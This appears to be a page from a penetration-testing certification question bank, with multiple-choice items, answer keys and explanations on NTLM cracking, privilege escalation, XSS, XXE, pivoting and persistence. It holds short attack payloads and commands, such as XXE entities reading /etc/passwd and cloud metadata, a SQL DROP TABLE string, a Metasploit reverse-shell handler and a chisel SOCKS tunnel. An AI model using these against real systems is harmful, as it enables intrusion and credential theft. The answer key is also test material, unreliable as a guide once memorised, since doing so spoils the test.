Hashcat mode 1000 is the designated mode for cracking NT/NTLM hashes, the MD4-based hash of the UTF-16LE password used by Windows for authentication. When an attacker captures NTLM hashes (e.g., from the SAM database or NTDS.dit), mode 1000 is required because the hash format is not a generic MD5 or another algorithm; it's a specific Windows-specific format. This mode directly processes the raw 32-character hexadecimal NTLM hash and is the correct choice for this scenario.

Why this answer

Hashcat mode 1000 corresponds to NTLM hashes.

42
MCQmedium

A penetration tester obtains a low-privilege shell on a Linux host during an engagement. While enumerating, the tester finds a cron job that runs a script located in a world-writable directory as root every five minutes. Which action should the tester take to escalate privileges using this finding?

A.Search for SUID binaries and abuse one that permits arbitrary file reads
B.Modify the script in the world-writable directory to execute a reverse shell when the cron job runs
C.Run 'sudo -l' to list permitted commands and find a binary that can be abused for escalation
D.Read /etc/crontab to confirm the schedule and then wait for the job to run unmodified
AnswerB

A root-owned cron job executing a script stored in a world-writable directory is a classic privilege escalation path. Because the tester can overwrite the script's contents, the next scheduled execution runs the modified code with root privileges. Replacing the script body with a command that spawns a root shell directly leverages the misconfiguration found during enumeration.

Why this answer

The exploitable condition is a scheduled task running as root that executes a file the low-privilege user can write. Overwriting that script causes the cron daemon to run attacker-controlled code with root privileges on the next interval. This directly converts the enumerated misconfiguration into elevated access, which is the intended outcome.

Exam trap

The trap here is treating enumeration steps such as checking sudo rights or SUID binaries as the exploit itself, when the scenario already hands the tester a concrete writable-script weakness to abuse.

43
MCQmedium

During a web application test, you discover a parameter that reflects user input in the response without proper encoding. You craft a payload that executes JavaScript in the victim's browser. This vulnerability is best classified as:

A.Stored XSS
B.Server-side request forgery (SSRF)
C.Reflected XSS
D.DOM-based XSS
AnswerC

Reflected XSS occurs when a user-controlled parameter is embedded into the HTTP response without proper encoding or sanitization, and the browser executes the injected script as part of the page. The script is triggered only when the victim clicks a crafted link, making the attack non-persistent. Since the parameter is directly reflected in the response and the server is echoing the input, this matches the classic signature of reflected XSS.

Why this answer

Reflected XSS occurs when user input is immediately reflected back in the response without proper sanitization, allowing script execution.

44
MCQeasy

A penetration tester is asked to assess whether an organization's employees can be tricked into revealing credentials. The client approves an assessment in which the tester registers a look-alike domain and sends emails directing staff to a fake login page. Which type of assessment is the tester conducting?

A.A wireless assessment targeting rogue access points
B.A vulnerability scan of the external attack surface
C.A phishing simulation targeting credential harvesting
D.A physical intrusion test using tailgating techniques
AnswerC

Registering a look-alike domain and luring employees to a counterfeit login page to capture credentials is the defining pattern of a phishing simulation focused on credential harvesting. The objective is to measure human susceptibility and the effectiveness of awareness controls, which matches the approved scenario of tricking staff into revealing their login details.

Why this answer

The engagement uses a spoofed domain and a counterfeit login page delivered through email to induce employees to surrender credentials. That combination of social engineering and credential capture defines a phishing simulation. Its purpose is to quantify human risk and test the effectiveness of awareness training and email controls, which aligns exactly with the client's approved objective.

Exam trap

The trap here is overcomplicating the classification when the described activity of a spoofed domain plus fake login page is straightforwardly phishing, not a technical infrastructure or wireless assessment.

45
MCQeasy

During a penetration test, a tester wants to crack NTLM hashes captured from a Windows domain. Which hashcat mode should the tester use for NTLM hashes?

A.-m 13100
B.-m 1000
C.-m 22000
D.-m 0
AnswerB

Mode 1000 is the correct Hashcat mode for cracking NTLM hashes, which are the legacy Windows authentication digests stored in SAM and NTDS.dit. Each NTLM hash is specifically a single MD4 hash of the user's password in UTF-16LE encoding, a design that makes these hashes extremely fast to brute-force.

Why this answer

Hashcat mode -m 1000 is specifically designated for NTLM hashes, which are the format stored in Windows SAM and NTDS.dit files and transmitted during NTLM authentication. When a tester captures NTLM challenge-response traffic or extracts hashes from a domain controller, -m 1000 tells hashcat to parse the 32-hex-character NTLM hash correctly. This is the standard mode used in tools like Responder + hashcat workflows during internal Active Directory penetration tests.

Exam trap

PT0-003 often tests the distinction between NTLM (mode 1000), NetNTLMv2 (mode 5600), and Kerberoasting TGS-REP (mode 13100), since candidates frequently memorize one NTLM mode and apply it to every Windows hash scenario.

How to eliminate wrong answers

Option A is wrong because -m 13100 corresponds to Kerberos 5 TGS-REP etype 23 (Kerberoasting), not NTLM. Option C is wrong because -m 22000 is the combined WPA-PBKDF2-PMKID+EAPOL mode for Wi-Fi handshakes, unrelated to Windows authentication. Option D is wrong because -m 0 is raw MD5, which produces a different digest and will never match an NTLM hash.

46
Multi-Selectmedium

A penetration tester is testing a web application and wants to exploit an XXE vulnerability to read sensitive files. Which TWO payloads could be used?

Select 2 answers
A.<script>alert(1)</script>
B.<!DOCTYPE foo [<!ENTITY xxe SYSTEM 'http://169.254.169.254/latest/meta-data/'>]>
C.<!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]>
D.'; DROP TABLE users; --
E.../../etc/passwd
AnswersB, C

This payload defines an external entity named 'xxe' that points to the link-local cloud metadata service at 169.254.169.254. When the vulnerable XML parser resolves the entity, it performs a server-side request to that URL, allowing the tester to access instance metadata like IAM credentials. This is both an XXE and an SSRF, specifically aimed at cloud environments.

Why this answer

XXE can be used to read files via file:// or to perform SSRF to internal resources via http://, including cloud metadata.

47
MCQeasy

During a penetration test, a tester captures NTLMv2 hashes by spoofing LLMNR and NBT-NS responses on the internal network. Which tool is most commonly used for this type of attack?

A.ntlmrelayx
B.Bettercap
C.Hashcat
D.Responder
AnswerD

Responder is the de facto tool for poisoning LLMNR, NBT-NS, and mDNS queries by answering them with the attacker's IP address, thereby causing clients to send SMB authentication attempts containing NTLMv2 hashes. It operates in the background, listens to broadcast name resolution requests, and tricks unsuspecting hosts into sending their credential material. Once captured, the hashes can be cracked offline with hashcat or relayed via ntlmrelayx, making Responder the correct initial-phase tool for this goal.

Why this answer

Responder is a widely used tool for LLMNR/NBT-NS/mDNS poisoning to capture NTLM hashes.

48
MCQeasy

A penetration tester has compromised a Linux web server and wants to maintain persistent access by creating a new user account with a known password. The tester has root privileges. Which of the following commands will create a new user named 'support' with a home directory and a bash shell?

A.useradd -m -s /bin/bash support
B.passwd support --create --home /home/support --shell /bin/bash
C.adduser support --shell /bin/bash --home /home/support
D.usermod -aG support -d /home/support -s /bin/bash
AnswerA

The useradd command creates a new user. The -m flag ensures a home directory is created, and -s /bin/bash sets the login shell to bash. This matches the requirement to create a user with a home directory and bash shell. After running this, the tester would set a password with passwd support. This is the standard and correct way to add a user on most Linux distributions.

Why this answer

The useradd command with -m and -s creates a new user with a home directory and specified shell. This is the standard low-level utility available on most Linux distributions. After creating the account, the tester would set a password using passwd.

The other commands either modify existing users, use non-standard syntax, or are for password management only, making them unsuitable for creating a new persistent account.

Exam trap

The trap here is confusing user creation with user modification, or assuming that adduser and useradd are interchangeable across all Linux distributions.

49
Multi-Selecthard

During a penetration test, a tester successfully exploits a web application and gains a foothold. The tester needs to pivot to an internal network segment that is not directly accessible. Which THREE tools can the tester use to create a SOCKS proxy or tunnel for pivoting?

Select 3 answers
A.Chisel
B.Netcat
C.Nmap
D.Ligolo-ng
E.SSH with -D flag
AnswersA, D, E

Chisel tunnels TCP over HTTP/WebSocket, creating a SOCKS proxy through the foothold host. This satisfies the requirement to reach the internal segment that is not directly accessible, and works where only HTTP egress is permitted.

Why this answer

Chisel (A) is correct because it is a fast TCP/UDP tunneling tool written in Go that can run a server on the compromised host and a client locally, creating a SOCKS5 proxy for pivoting into internal networks. Ligolo-ng (D) is correct because it provides a TUN-based reverse tunneling agent that establishes a SOCKS proxy and routes traffic to internal segments without needing a full VPN, making it ideal for pivoting during penetration tests. SSH with the -D flag (E) is correct because it opens a dynamic SOCKS proxy on a local port, allowing the tester to tunnel traffic through the compromised host if SSH access is available.

Netcat (B) is not marked correct because, while it can create basic TCP relays, it does not natively provide a SOCKS proxy or full tunneling capability for pivoting. Nmap (C) is not marked correct because it is a port scanner and does not include SOCKS proxy or tunneling features for pivoting.

Exam trap

The trap is assuming that Netcat can easily create a SOCKS proxy; it can only do simple port forwarding, not dynamic proxying.

50
MCQhard

During a web application test, the tester discovers a parameter that reflects user input in the response without proper encoding. The tester crafts a payload that executes JavaScript when another user views the page. Which type of XSS is this, and what is a primary risk?

A.Stored XSS; risk of data theft from database
B.Reflected XSS; risk of session hijacking
C.Blind XSS; risk of internal network scanning
D.DOM-based XSS; risk of client-side logic bypass
AnswerB

Reflected XSS occurs when user-supplied input is immediately echoed back in the server's response without proper sanitization or encoding. The attacker crafts a malicious URL containing script payload and lures the victim into clicking it; when the page loads, the script runs in the victim's session. This allows the attacker to steal session cookies via document.cookie and send them off-site, facilitating session hijacking. Because the payload is not persisted on the server, delivery depends on the victim accessing the crafted link.

Why this answer

Reflected XSS executes in the victim's browser when the malicious link is clicked, allowing session hijacking.

51
MCQmedium

A penetration tester uses Hashcat to crack NTLM hashes captured during a pass-the-hash attack. Which Hashcat mode should the tester use for NTLM hashes?

A.-m 0
B.-m 13100
C.-m 1000
D.-m 22000
AnswerC

Hashcat mode 1000 targets raw NTLM hashes, matching the captured pass-the-hash material exactly. Unlike mode 5500, which expects NetNTLMv1 challenge-response pairs, mode 1000 parses the bare 16-byte NT hash directly, so the tester avoids format errors and cracks the captured credentials efficiently.

Why this answer

Hashcat mode -m 1000 is for NTLM hashes. Other modes correspond to different hash types.

52
MCQmedium

A penetration tester needs to perform Kerberoasting against an Active Directory domain. Which step is required after requesting TGS tickets?

A.Crack the TGS hashes offline
B.Perform SMB relay
C.Request TGT ticket
D.Extract NTLM hashes from LSASS
AnswerA

Kerberoasting correctly involves requesting service ticket (TGS) hashes for Service Principal Names (SPNs), then transferring them to an offline workstation. Because the TGS is encrypted with the target service account's NTLM hash, an attacker can run hashcat or John the Ripper against it to recover the plaintext password, especially if the password is weak or reused. The offline cracking step is what makes the attack low-risk and highly successful.

Why this answer

After requesting TGS tickets for service accounts, the tester must crack the hashes offline using a tool like Hashcat.

53
MCQeasy

A penetration tester wants to perform a pass-the-hash attack against a Windows system. Which tool can be used to authenticate using the NTLM hash instead of a password?

A.Responder
B.Hashcat
C.CrackMapExec
D.John the Ripper
AnswerC

CrackMapExec accepts an NTLM hash via its -H flag and passes it directly during SMB or WinRM authentication, so no plaintext password is needed. This exploits NTLM's design, where the hash itself is the credential, enabling lateral movement across Windows hosts.

Why this answer

CrackMapExec supports pass-the-hash authentication with NTLM hashes.

54
Multi-Selecthard

During a post-exploitation phase, a tester needs to establish persistence on a Windows target. Which THREE methods are commonly used for persistence on Windows?

Select 3 answers
A.Pass-the-hash
B.Cron jobs
C.Registry Run keys
D.WMI subscriptions
E.Scheduled tasks
AnswersC, D, E

Registry Run keys are a classic Windows persistence mechanism where an attacker adds a value to a run key such as HKCU\Software\Microsoft\Windows\CurrentVersion\Run or HKLM\Software\Microsoft\Windows\CurrentVersion\Run. Any executable referenced by these keys launches automatically when the designated user logs on, requiring minimal privileges for the HKCU variant and no need for a service or scheduled trigger. This is a straightforward, widely used persistence method that directly survives a reboot and re-authentication of the compromised user account.

Why this answer

Scheduled tasks, registry Run keys, and WMI subscriptions are common persistence mechanisms. Pass-the-hash is lateral movement, and cron jobs are Linux-specific.

55
MCQeasy

A penetration tester identifies a Linux binary with the SUID bit set. Which command can find all SUID binaries on a Linux system?

A.ps aux
B.ls -la
C.chmod u+s
D.find / -perm /4000
AnswerD

find / -perm /4000 recursively traverses the entire filesystem and matches files whose mode contains the SUID bit, expressed by the octal value 4000. The leading slash in -perm /4000 tells find to match when any of the specified permission bits are set, which is exactly the SUID bit (the normal execute bits don't need to be checked). This finds every SUID binary, including non-root-owned ones, making it the standard way to enumerate SUID files for privilege escalation.

Why this answer

The find command with -perm /4000 lists files with SUID set.

56
MCQhard

A tester wants to exploit a Windows service running with SYSTEM privileges that has an unquoted service path containing spaces. Which technique should be used to escalate privileges?

A.AlwaysInstallElevated
B.Token impersonation
C.Unquoted service path exploitation
D.DLL hijacking
AnswerC

An unquoted service path occurs when the ImagePath registry value for a service contains spaces but is not enclosed in quotes. When Windows starts the service, it attempts to locate the executable by splitting the path at each space and trying the resulting filenames, moving from left to right. If an attacker has write access to a directory earlier in that sequence, they can drop a malicious executable (e.g., C:\Program.exe or C:\Program Files\Vendor.exe) that Windows will execute with the service's SYSTEM privileges. This is the correct exploitation method because it directly abuses the service's own path configuration to achieve code execution as SYSTEM.

Why this answer

An unquoted service path allows placing an executable with the same name as a folder in the path, which Windows will execute with SYSTEM privileges.

57
MCQmedium

During a web application test, a tester discovers that the application uses JSON Web Tokens (JWT) for authentication. The tester intercepts a JWT and changes the algorithm header to 'none' with an empty signature. Which attack is being attempted?

A.SQL injection
B.SSRF
C.JWT alg:none attack
D.IDOR
AnswerC

A JWT alg:none attack works by changing the token's `alg` header field to `none`, signaling that the token is unsecured. Vulnerable JWT libraries that accept this value will skip signature verification entirely, allowing an attacker to forge tokens with arbitrary claims, such as elevating privileges, without knowing the secret key. This directly exploits the server's failure to enforce strict algorithm allowlists.

Why this answer

Setting algorithm to 'none' is a JWT algorithm confusion attack where the server accepts unsigned tokens.

58
MCQmedium

A penetration tester is performing a password attack on a Windows domain and has captured NTLM hashes. Which tool can be used to perform a pass-the-hash attack to gain remote code execution on a target system?

A.Hashcat
B.Responder
C.pth-winexe
D.John the Ripper
AnswerC

pth-winexe is part of the pass-the-hash toolkit that implements the Windows SMB client and authentication stack, allowing you to authenticate to a remote Windows host using only the NTLM hash as the credential. It substitutes the password in the NTLM/SPNEGO exchange with the hash, establishes an authenticated session, and executes a specified command without ever knowing the plaintext password. This directly demonstrates pass-the-hash: the hash itself serves as the proof of knowledge to impersonate the user.

Why this answer

pth-winexe is a tool specifically designed for pass-the-hash attacks to execute commands on remote Windows systems.

59
Multi-Selectmedium

A penetration tester is performing post-exploitation on a compromised Linux server and wants to maintain persistence. Which TWO of the following methods are commonly used for Linux persistence?

Select 2 answers
A.Modifying registry Run keys
B.Creating scheduled tasks
C.Creating WMI subscriptions
D.Adding SSH authorized_keys
E.Creating cron jobs
AnswersD, E

Appending an attacker-controlled public key to ~/.ssh/authorized_keys on the compromised Linux host enables passwordless SSH authentication for that user at any time. This grants persistent remote access that survives reboots and does not rely on additional commands running at intervals. It is a stealthy and reliable persistence method, especially on servers where SSH is exposed.

Why this answer

Cron jobs and SSH authorized_keys are common persistence techniques. Scheduled tasks are Windows-specific, registry is Windows, WMI is Windows.

60
MCQmedium

A penetration tester needs to escalate privileges on a Linux system and finds that the user can run a script with sudo that has a vulnerable argument. Which resource should the tester consult to find exploitation techniques for common sudo misconfigurations?

A.GTFOBins
B.Exploit-DB
C.Metasploit
D.CVE Details
AnswerA

GTFOBins is a curated repository of Unix binary exploitation techniques, specifically cataloging ways to abuse binaries for privilege escalation. For a Linux system, if a penetration tester discovers via 'sudo -l' that a binary can be executed with sudo privileges, GTFOBins provides exact command sequences to leverage that binary to spawn a root shell or read protected files. It is the go-to, command-focused resource for sudo misconfigurations and setuid abuse, making it directly applicable to the scenario.

Why this answer

GTFOBins is a curated list of Unix binaries that can be exploited to bypass local security restrictions, including sudo misconfigurations.

61
MCQeasy

A penetration tester wants to crack NTLM hashes obtained from a Windows domain. Which hashcat mode should the tester use?

A.-m 22000
B.-m 13100
C.-m 0
D.-m 1000
AnswerD

Hashcat mode 1000 is the correct choice for NTLM hashes, which are the standard credential material extracted from Windows SAM files, NTDS.dit, or memory dumps. These hashes are computed by first converting the password to UTF-16LE and then applying the MD4 hash algorithm, a process unique to Windows authentication. Mode 1000 tells Hashcat to treat each hash as a 32-character hexadecimal NTLM digest, enabling efficient dictionary, rule-based, or brute-force attacks specifically tailored to this format, including pass-the-hash and offline cracking scenarios.

Why this answer

Hashcat mode 1000 is for NTLM hashes.

62
MCQhard

A penetration tester has compromised a Linux host and wants to use it as a pivot point to access an internal network that is not directly reachable from the attacker's machine. Which tool can create a SOCKS proxy for routing traffic through the compromised host?

A.Responder
B.chisel
C.nmap
D.netcat
AnswerB

Chisel is a single-binary client/server tunnel program that can establish an outbound reverse tunnel from a compromised Linux host to the attacker's C2 server, then expose a SOCKS5 proxy on the attacking machine at the remote end. For example, the attacker runs `chisel server --reverse --socks5` and the compromised host runs `chisel client <attacker-ip>:8080 R:socks`. Because the client makes the initial outbound connection, this evades most inbound firewall rules, and the resulting SOCKS5 proxy allows any attacker tool to route scans and traffic into the target's internal network through the compromised host.

Why this answer

Chisel is a fast TCP/UDP tunnel over HTTP that can create a SOCKS proxy for pivoting.

63
MCQmedium

A tester runs the following Metasploit commands: ``` msf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set LHOST 10.0.0.5 msf6 exploit(multi/handler) > set LPORT 4444 msf6 exploit(multi/handler) > run ``` What is the purpose of this configuration?

A.To exploit a remote service directly
B.To receive a reverse shell from a target that already executed the payload
C.To perform a bind shell attack
D.To stage a payload for later execution
AnswerB

This is the correct function: multi/handler acts as a listener that waits for a reverse TCP connection from a target that has already executed a Meterpreter or other reverse payload. In a typical attack workflow, the tester starts this handler on their machine, then delivers a payload to the target via phishing, exploit, or direct execution; once the target runs the payload, it connects back to the handler's listening port. The handler then provides an interactive session (e.g., Meterpreter) for post-exploitation. It is a generic catch-all for reverse shells and is indispensable when using staged payloads, where the initial stager connects back to fetch the full payload.

Why this answer

The multi/handler is a generic handler used to receive reverse connections from payloads that were delivered separately (e.g., via phishing). It waits for the target to connect back.

64
Multi-Selectmedium

A penetration tester is conducting a web application test and discovers an XML External Entity (XXE) vulnerability. Which of the following attacks can the tester perform using XXE? (Choose THREE.)

Select 3 answers
A.Read sensitive files from the server
B.Denial of service via entity expansion (billion laughs)
C.Perform Server-Side Request Forgery (SSRF)
D.SQL injection through entity values
E.Remote code execution
AnswersA, B, C

An XML parser allows an attacker to define an external entity, such as `<!ENTITY xxe SYSTEM "file:///etc/passwd">`. When the application processes the XML and includes the entity in a response or error message, the server reads the local file and returns its contents, disclosing credentials, configuration, or other sensitive data. This requires the parser to resolve external general entities without secure settings, a common misconfiguration in web applications.

Why this answer

XXE can be used to read files, perform SSRF, and cause denial of service via entity expansion.

65
MCQmedium

A penetration tester wants to perform a pass-the-hash attack against a Windows target. Which tools can be used to authenticate using an NTLM hash without knowing the plaintext password? (Choose the best option.)

A.Nmap
B.Responder
C.Wireshark
D.CrackMapExec
AnswerD

CrackMapExec is a post-exploitation and lateral movement tool that natively supports pass-the-hash by accepting NTLM hashes via the -H or --hash parameter. It actively authenticates to SMB, WinRM, and other services using the supplied hash, enabling command execution, credential dumping, and domain enumeration across multiple hosts. This makes it a direct and effective utility for conducting pass-the-hash attacks in a penetration test.

Why this answer

CrackMapExec is a popular tool for pass-the-hash attacks across many Windows services.

66
Multi-Selectmedium

A penetration tester is performing a full-scope engagement and needs to identify potential privilege escalation vectors on a Windows system. Which TWO of the following are valid Windows privilege escalation techniques?

Select 2 answers
A.Unquoted service path exploitation
B.Pass-the-hash
C.AlwaysInstallElevated registry key abuse
D.Kerberoasting
E.SUID/SGID binary exploitation
AnswersA, C

Unquoted service path exploitation occurs when a Windows service binary's path contains spaces but is not enclosed in quotes. When Windows resolves the path, it checks each space-separated segment in turn, so an attacker with write access to an early directory (e.g., C:\Program.exe or C:\Program Files\Sub.exe) can plant a malicious executable that the service will launch with its own high-integrity privileges, typically SYSTEM. This yields arbitrary code execution without needing credentials or exploiting a kernel bug.

Why this answer

Unquoted service paths and AlwaysInstallElevated are both valid Windows privilege escalation techniques. Kerberoasting and pass-the-hash are for credential access, not local escalation; SUID/SGID is Linux.

67
Multi-Selecthard

A tester is performing a post-exploitation phase on a compromised Linux server and wants to establish persistence. Which THREE of the following methods are commonly used for Linux persistence? (Choose THREE.)

Select 3 answers
A.Adding a registry Run key
B.Adding an SSH public key to ~/.ssh/authorized_keys
C.Creating a systemd service to start on boot
D.Creating a scheduled task using schtasks
E.Adding a cron job to execute a reverse shell periodically
AnswersB, C, E

Appending the attacker's public key to ~/.ssh/authorized_keys enables passwordless key-based authentication for the targeted user account. This grants persistent SSH access without needing to re-establish a foothold through a vulnerability, and it remains effective across reboots and user sessions. The private key stays with the attacker, allowing them to authenticate at any time as long as the SSH service is exposed and the user account remains valid.

Why this answer

Common Linux persistence methods include adding cron jobs (crontab), creating a systemd service that starts on boot, and adding SSH authorized keys for backdoor access. Scheduled tasks are Windows-specific; Registry Run keys are also Windows-only.

68
MCQmedium

You have captured an NTLMv2 hash from a LLMNR poisoning attack using Responder. Which tool and mode would you use to attempt to crack the hash using a dictionary attack?

A.Hashcat -m 5600 -a 0
B.John the Ripper --format=LM --wordlist
C.Hashcat -m 1000 -a 0
D.John the Ripper --format=NT --wordlist
AnswerA

Hashcat's -m 5600 specifically targets NetNTLMv2 hashes, the exact challenge-response format captured via LLMNR/NBNS poisoning tools like Responder. The -a 0 flag designates a straight dictionary attack, allowing you to feed a wordlist of candidate passwords. This is the correct and complete command for cracking the captured NTLMv2 hash, as it selects both the right hash type and the appropriate attack mode.

Why this answer

Hashcat mode 5600 is for NTLMv2 hashes; -a 0 is dictionary attack.

69
MCQmedium

A tester is exploiting a SQL injection vulnerability in a login form. The application returns different responses for valid and invalid queries. However, the tester cannot see the database output. Which type of SQL injection is most likely?

A.Out-of-band SQL injection
B.Blind SQL injection
C.UNION-based SQL injection
D.Error-based SQL injection
AnswerB

Blind SQL injection is correct because the tester is exploiting the vulnerability without seeing actual query results or database errors in the application response. Instead, they infer database behavior by observing differences in application responses — either boolean outcomes (e.g., ' AND 1=1 vs ' AND 1=2 causing different page content) or time delays (e.g., SLEEP or WAITFOR DELAY). These indirect signals allow the tester to extract data piece by piece, which aligns with the scenario of exploiting a SQL injection in a low-information environment.

Why this answer

Blind SQL injection occurs when query results are not directly reflected, but the application behavior changes based on truth values.

70
MCQhard

During a web application test, a tester discovers a JWT token with the following header: {'alg':'HS256','typ':'JWT'}. The token payload contains 'admin':false. The tester attempts to change the algorithm to 'none' and removes the signature. Which vulnerability is being exploited?

A.JWT brute-force
B.JWT algorithm confusion (alg:none)
C.JWT kid injection
D.JWT injection
AnswerB

JWT algorithm confusion (alg:none) occurs when a server accepts a JWT whose header declares the "alg" parameter as "none" (or "None"/"NONE"), which instructs the verifier that the token has no digital signature. An attacker can modify the token's payload, set alg to none, and remove the signature entirely; if the library does not explicitly reject none, the token is trusted as if it were properly signed. This directly bypasses signature verification without the attacker knowing any secret key.

Why this answer

JWT alg:none attack exploits servers that accept unsigned tokens. Other options are different attack types.

71
MCQmedium

A penetration tester is performing an NTLM relay attack against a Windows network. The tester uses ntlmrelayx to relay captured NTLM authentication attempts to a target server. What must be true for this attack to succeed?

A.LLMNR must be enabled
B.The relayed hash must be crackable
C.The target server must have SMB signing enabled
D.SMB signing must be disabled or not enforced
AnswerD

For an NTLM relay attack against SMB to work, the target server must not require SMB signing, meaning signing is disabled or set to 'Not Enforced.' Without mandatory signing, the server accepts SMB packets without verifying their integrity, allowing an attacker to forward a captured NTLM authentication exchange to establish a session. This is why the correct condition is that SMB signing must be disabled or not enforced, as enforced signing blocks the relay entirely.

Why this answer

SMB signing must be disabled or not enforced on the target server, otherwise the relayed authentication will be rejected.

72
MCQeasy

A penetration tester needs to escalate privileges on a Linux system and finds that the current user can run a specific command with sudo without a password. Which tool should the tester consult to find known exploitation techniques for that command?

A.Exploit-DB
B.HackTricks
C.Metasploit
D.GTFOBins
AnswerD

GTFOBins is the authoritative, community-maintained list of Unix binaries that can be abused to bypass local security restrictions, with a dedicated 'sudo' section. It provides exact commands—such as `sudo find . -exec /bin/sh \;`—for each binary that can be used to escalate privileges when that binary is listed in the sudoers file. Cross-referencing the output of `sudo -l` against GTFOBins is the standard technique for detecting sudo misconfigurations during a Linux privilege escalation assessment.

Why this answer

GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions.

73
MCQeasy

A penetration tester is using Hashcat to crack NTLM hashes obtained from a Windows domain controller. Which hash mode should the tester specify for NTLM hashes?

A.-m 22000
B.-m 0
C.-m 13100
D.-m 1000
AnswerD

Hashcat mode 1000 is the exact and documented mode for NTLM hashes, which are generated by computing MD4 of the password's UTF-16LE representation. When a penetration tester extracts NTLM hashes from a Windows target—via Samdump, Mimikatz, or an NTDS.dit dump—this is the mode to use for offline password cracking. Specifying -m 1000 correctly tells hashcat to apply the NTLM algorithm, enabling effective dictionary, rule-based, or mask attacks.

Why this answer

Hashcat uses mode -m 1000 for NTLM hashes. Mode 0 is for MD5, mode 13100 is for Kerberoast, and mode 22000 is for WPA2.

74
MCQmedium

A tester is performing a Kerberoasting attack. After requesting TGS tickets for accounts with SPNs, what is the next step to obtain plaintext credentials?

A.Pass-the-ticket to access services
B.Relay the TGS tickets to another server
C.Use the TGS tickets for silver ticket attacks
D.Crack the TGS tickets using Hashcat or John the Ripper
AnswerD

Kerberoasting involves requesting TGS tickets for service accounts via SPN, then extracting the tickets and cracking them offline with Hashcat or John the Ripper. The TGS is encrypted with the service account's NTLM hash, and because many service accounts have weak or human-memorizable passwords, the encrypted blob can be brute-forced or dictionary-attacked offline. Successful cracking yields the service account's plaintext password, enabling further compromise.

Why this answer

Kerberoasting involves cracking the TGS tickets offline to recover the service account password.

75
Multi-Selectmedium

A penetration tester is performing a web application test and identifies a potential SQL injection vulnerability. Which TWO methods can the tester use to confirm the vulnerability and extract data?

Select 2 answers
A.XXE injection
B.Command injection
C.Blind time-based SQL injection
D.XSS injection
E.UNION-based SQL injection
AnswersC, E

Blind time-based SQL injection confirms the vulnerability without visible output: the tester injects conditional delays (for example WAITFOR DELAY or SLEEP) and infers true/false from response timing, satisfying the stem's requirement to confirm and extract data when the application returns no query results or error messages.

Why this answer

UNION-based and blind time-based are classic SQL injection techniques. XSS and command injection are different attacks. XXE is also different.

Page 1 of 2 · 146 questions totalNext →

Ready to test yourself?

Try a timed practice session using only Attacks and Exploits questions.